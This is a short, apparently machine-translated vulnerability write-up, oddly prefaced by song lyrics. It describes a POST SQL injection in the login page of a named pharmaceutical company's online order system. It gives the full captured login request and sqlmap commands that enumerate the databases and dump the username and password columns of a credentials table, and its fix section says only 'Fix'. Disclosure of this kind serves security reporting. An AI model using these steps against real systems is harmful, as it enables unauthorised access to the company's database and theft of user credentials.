SQL Injection exists in the Online Order System of a pharmaceutical company
~ Spread out your palm
Let me see you
Mysterious and mysterious secrets
Check if I have you.
Spread out your palm
Hold my love
Not so hard
This will shake my heart
Also cut your palm
Your heart ~
Access: http: // **. **/UserLogin. aspx,
The sinopharm online order system logs in and has POST injection,
Code Region
POST /UserLogin.aspx HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 219Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/UserLogin.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=43oxse553rqukgneqml44d55__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMTA3MjkwMjY0ZGQ05P3BzGqDyC0MCc8t%2FE0TopuF2Q%3D%3D&__VIEWSTATEGENERATOR=7A1355CA&txt_username=cnmc&txt_password=adsq&RadioButtonList1=1&btn_login=%E7%99%BB+%E5%BD%95
Put in sqlmap
[root@Hacker~]# Sqlmap -r cncm1.txt --dbs,:
[root@Hacker~]# Sqlmap -r cncm1.txt -D WSD -T PUB_PASSWORD -C USERNAME,PAS
SWORD --dump
Some user information ,:
Solution:
~ Fix ~.